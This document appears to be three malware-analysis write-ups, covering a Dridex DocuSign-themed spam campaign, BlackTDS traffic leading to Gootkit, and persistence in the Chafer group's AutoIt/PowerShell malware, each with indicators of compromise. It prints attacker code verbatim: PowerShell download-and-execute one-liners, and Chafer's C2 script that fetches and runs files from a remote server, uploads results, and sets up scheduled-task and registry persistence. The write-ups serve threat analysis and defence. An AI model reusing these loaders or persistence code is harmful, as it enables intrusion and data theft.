Malware Spam Internals: Docusign Spam Leads Dridex Banking Malware Botnet ID “23005”

Goal: Reverse and document the latest Dridex banking malware campaign related to botnet ID “23005.”
Thanks to @James_inthe_box, I decided to quickly analyze and document the Dridex botnet ID “23005” spam infection chain leading from the spam campaign impersonating DocuSign. The observed subject of the Dridex campaign was “Please DocuSign the attached Business Activity Statements.”
Malware Spam Chain:
I. Spam Microsoft Word Macro Document 

II. CMD/PowerShell Execution & Download to %TMP%\jjkv.exe & %TMP%\gwzoxu.bat.
Payload domains: 

  • hxxps://meshbazaar[.]com/src/point[.]pdf
  • hxxp://myhomegt[.]com/src/point[.]pdf

The Dridex payloads were staged by the operators on March 29 14:12 GMT.

III. Batch Script Binary Execution

cmd /c PowerShell “‘PowerShell “”function MASWE([String] $senw){(New-Object System.Net.WebClient).DownloadFile($senw,”%TMP%\jjvkh.exe”);Start-Process ”%TMP%\jjvkh.exe”;} try{ MASWE(”hxxps://meshbazaar[.]com/src/point[.]pdf”)} catch{ MASWE(”hxxp://myhomegt[.]com/src/point[.]pdf”)}'”” | Out-File -encoding ASCII -FilePath %TMP%\gwzoxu[.]bat; Start-Process ‘%TMP%\gwzoxu.bat’ -WindowStyle Hidden”Botnet ID:
IV. The Dridex binary contains four hardcoded peers communicating  on the quite unusual port 3889. These ports normally associated with “D and V Tester Control Port.”

V. Addendum: Indicators of Compromise (IOCs):
Spam subject:
  • “Please DocuSign the attached Business Activity Statements”

Malicious Word loader (MD5):

  • 5E022694C0DBD1FBBC263D608E577949
Dridex payload download:
  • hxxp://myhomegt[.]com/src/point[.]pdf
  • hxxps://meshbazaar[.]com/src/point[.]pdf
First-layer peer block:

  • 46.105.131[.]88:443
  • 198.57.157[.]216:3889
  • 149.202.153[.]251:3889
  • 67.212.241[.]131:443

Dridex “23005” binary (MD5):

  • MD5: 88ce6c0affcdbdc82abe53957dddfa12

Malware Traffic Internals: BlackTDS Leads to Gootkit Banking Malware Distribution

Goal: Review and document latest BlackTDS traffic distribution leading to Gootkit banking malware.
While analyzing the BlackTDS traffic distribution, I noticed the BlackTDS iframe leading to the zip archive download that would ultimately download the Gootkit banking malware. Gootkit banking malware gang appears to have started utilizing the BlackTDS for banking malware distribution in addition to the steady stream of spam campaigns (from Mailchip to Mailgun spam abuses), meticulously tracked by @dvk01uk.

Traffic chain
I. BlackTDS domain redirect:

html, body { margin: 0; padding: 0; height : 100%; }
document.write(‘\location = \’hxxps://quickbooksa[.]com/data/\’;\’);
<a href="/insert“>[BLOB][BLOB]
II. Download zip archive “” containing a JavaScript loader
MD5 ( = 71345b139166482acaa568ac8816c7bc
III. JavaScript loader “Facture_FA03704.js”:
MD5 (Facture_FA03704.js) = 1b60021baedc3f9201bcdb40e9b87f62
IV. Download Gootkit Binary “Facture_c04507.pdf“:
Domain: anythingpng[.]com/data/facture_c04507.pdf 
V. Binary launch through CMD/PowerShell loader in %TEMP%
MD5 (facture_c04507.pdf) = c7c8d584758854bbe0d8e64ef53ae1a8

cmd.exe /C PowerShell “Start-Sleep 280; try{Start-Process %TEMP%\.exe -WindowStyle Hidden} catch{ }

Mutex: “ServiceEntryPointThread”

Additional quick Gootkit anti-analysis:

Addendum: Indicators of Compromise (IOCs):

  • hxxps://quickbooksa[.]com/data/Facture_FA03704[.]zip
  • anythingpng[.]com/data/facture_c04507[.]pdf 
Zip archive ““:

  • MD5: 71345b139166482acaa568ac8816c7bc
JavaScript Loader “Facture_FA03704.js”:
  • MD5: 1b60021baedc3f9201bcdb40e9b87f62
Gootkit Binary “Facture_c04507.pdf”:

  • MD5: c7c8d584758854bbe0d8e64ef53ae1a8

Let’s Learn: Internals of Iranian-Based Threat Group "Chafer" Malware: Autoit and PowerShell Persistence

Goal: Reverse-engineer Iranian threat group update “Chafer” payload installer focusing on its persistence Autoit and PowerShell techniques.


  • Payload fake Microsoft installer “Windows-KB3101246.exe” (MD5: 804460a4934947b5131ca79d9bd668cf; Original timestamp: Monday, July 31, 2017, 19:33:49 UTC)
  • PowerShell script dntx.ps1 (MD5: 5cc9ba617a8c53ae7c5cc4d23aced59d)
  • PowerShell script dnip.ps1 (MD5: 8132c61c0689dbcadf67b777f6acc9d9)
  • nsExec.dll (MD5: b38561661a7164e3bbb04edc3718fe89)
  • Autoit script “App.au3” (MD5: 263bc6861355553d7ff1e3848d661fb8) Original timestamp: Saturday, ‎December ‎2, ‎2017, ‏‎11:08:48 UTC

While investigating payload from the Iranian actor group “Chafer”, I decided to dive deeper into the chain to observe and document some of the interesting persistence and anti-evasive behavior, deployed by the group (thanks to @ClearskySec for the sample).

Historically. Chafer is known for its surveillance operations targeting various organizations from airlines to engineering, which are primary located in the Middle East. Outline:

I. Malware install
II. Autoit.exe installation
III. Autoit script “App.au3
IV. PowerShell script serverclient communications via DNS TXT and IP
V.  Task Schedule as “SC Scheduled Scan”

I. Malware install 
As of March 25, 2018, the initial malware binary masking as Windows-KB3101246.exe” notably appears to carry low detection ratio of 6/63 as displayed on VirusTotal. The binary is also bulky, packed with NSIS with over 1.8 MB of size containing the Autoit3.exe script along with the PowerShell command, and the embedded nsExec[.]dll.
The malware scripts left various clues as to the original operation and contains well-commented code. Additionally, the operators left commented out what appears to be the original server hxxp://107.191.62[.]45:7023/update[.]php

;============================ run powershell in assosation with $method ===============
Switch $method
Case 0
Local $exitcode = RunWait("powershell.exe -nop -executionpolicy bypass -File """ & $HOME & "dnip.ps1""" , '', @SW_HIDE)
_FileWriteLog(@ScriptDir & "\Ex.log", "Powershell start 0:" & $method & "\t ExitCode:" & $exitcode)
_FileWriteLog(@ScriptDir & "\Ex.log", "Home:" & $HOME)
Case 1
Local $exitcode = RunWait("powershell.exe -nop -executionpolicy bypass -File """ & $HOME & "dntx.ps1""" , '', @SW_HIDE)
_FileWriteLog(@ScriptDir & "\Ex.log", "Powershell start 1:" & $method & "\t ExitCode:" & $exitcode)
_FileWriteLog(@ScriptDir & "\Ex.log", "Home:" & $HOME)
Case 2
;Local $SERVER="http://107.191.62[.]45:7023/update[.]php?req=" & $cname
Local $SERVER="ht"&"tp:"&"/"&"/"& $userver&"/upd" & "ate."& "ph"&"p?req"& "=" & $cname
$Dwn= "powershell "" " & _
" &{$wc=(new-object System.Net.WebClient); " & _
"while(1){try{$r=Get-Random ;$wc.DownloadFile('" _
& $SERVER & _
"&m=d','" & $HOME & "dn\'+$r+'.-_');" & _
" Rename-Item -path ('" & _
$HOME & _
"dn\'+$r+'.-_') -newname " & _
"($wc.ResponseHeaders['Content-Disposition'].Substring(" & _

$Dwn = StringReplace($Dwn, "-_", "dwn")

RunWait($Dwn, '', @SW_HIDE)

$DownloadExecute="powershell "" " & _
"&{$r=Get-Random; "& _
"$wc=(new-object System.Net.WebClient);" & _
"$wc.DownloadFile('" & $SERVER & "&m=b','" & $HOME&"dn\'+$r+'.-_');" & _
"Invoke-Expression ('"& StringReplace($HOME, " ", "` ")&"dn\'+$r+'.-_ >" & StringReplace($HOME, " ", "` ")&"up\'+$r+'-_');" & _
"Rename-Item -path ('" & $HOME & _
"up\'+$r+'-_') -newname ($wc.ResponseHeaders['Content-Disposition'].Substring(" & _
"$wc.ResponseHeaders['Content-Disposition'].Indexof('filename=')+9)+'.txt');" & _
"Get-ChildItem " & StringReplace($HOME, " ", "` ") & "up\ | ForEach-Object "& _
"{if((Get-Item($_.FullName)).length -gt 0){$wc.UploadFile('" & _
"&m=u',$_.FullName)};" & _
"Remove-Item $_.FullName};Remove-Item ('"& $HOME & "dn\'+$r+'.-_')}"""

$DownloadExecute = StringReplace($DownloadExecute, "-_", "bat")

RunWait($DownloadExecute, '', @SW_HIDE)

The malware contains various functions, including the following (the original orthography is preserved):

MethodFinder (CheckDNSIP/CheckDNSTXT/CheckHttp)
RunWait(“ipconfig /flushdns”, ”, @SW_HIDE)
Local $HOME = @UserProfileDir & “\appdata\local\microsoft\Taskbar\”
Create essential directory
read method from reg if not exist create registry value (registry persistence)
create task scheduler

II. Persistence
By and large, the malware primarily leverages the directory “%APPDATA%\Local\Microsoft\Taskbar\” (as from the original script: “Local $HOME = @UserProfileDir & “\appdata\local\microsoft\Taskbar\”)for log and script storage. 
A. The malware achieves persistence via task scheduler leveraging command-line arguments after its initial drop in %TEMP% leveraging Autoit binary freeware BASIC-like scripting language with the custom script “App.au3.” The binary drops the Autoit3.exe execution along with the script to compile that runs via the schtasks feature.

%APPDATA%\\DROP_BINARY.tmp\” schtasks.exe /create /F /sc minute /mo 1 /tn \”SC Scheduled Scan\” /tr \”‘%APPDATA%\Local\Microsoft\Taskbar\Autoit3.exe’ ‘%APPDATA%\Local\Microsoft\Taskbar\App.au3’\” “

The original malware Autoit persistence script is as follows writing the log file “Ex.log”:

;=============================== create task schedule ===================================
$txtStr = "schta"&"sks /create /F"&" /sc minute /mo 3 /tn ""SC Scheduled Scan"" /tr ""%userprofile%\appdata\local\microsoft\Taskbar\autoit3.exe '" & @ScriptFullPath & "'"""
RunWait($txtStr, '', @SW_HIDE)
_FileWriteLog(@ScriptDir & "\Ex.log", "Method:" & $method)

B. Additionally, the binary launches itself also via batch leverage Windows Update Standalone Installer (wusa.exe), launched via dropped batch script “RunMSU” from the same “%APPDATA%\Local\Microsoft\Taskbar\”

echo off
wusa “%APPDATA%\Local\Microsoft\Taskbar\Windows6.0-KB3101246.msu”

C. Additionally, the malware achieves registry persistence  as follows creating  “UMe” and “UT”:

;============================= read method from reg if not exist create registry value =============
Local $epocTime = ((@YEAR - 1970) * 31557600) + (int ((@YEAR - 1972) / 4) * 86400) + ((@YDAY - 1) * 86400) + (@HOUR * 3600) + (@MIN * 60) + @SEC
Local $method = RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UMe")
if @error Then
RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UMe", "REG_SZ", "0")
RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UT", "REG_SZ", "0")
$method = 0;
Local $lastMethodFinderTime = RegRead("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UT")
if (@error or $epocTime - $lastMethodFinderTime > 400) Then
$method = MethodFinder()
_FileWriteLog(@ScriptDir & "\Ex.log", "newMethod:" & $method)
RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UMe", "REG_SZ", $method)
RegWrite("HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion", "UT", "REG_SZ", $epocTime)

Possible actions:
1. Monitor %APPDATA%\Local\Microsoft\Taskbar\ for possible artifacts related to Autoit scripts and PowerShell script, linked t the group.
2. Monitor for possible communications to suspicious domains, launched via PowerShell on URI patterns update-[.]php?req=.
3. Monitor for possible scheduler task “SC Scheduled Scan.”
4. Block C2: j-alam[.]com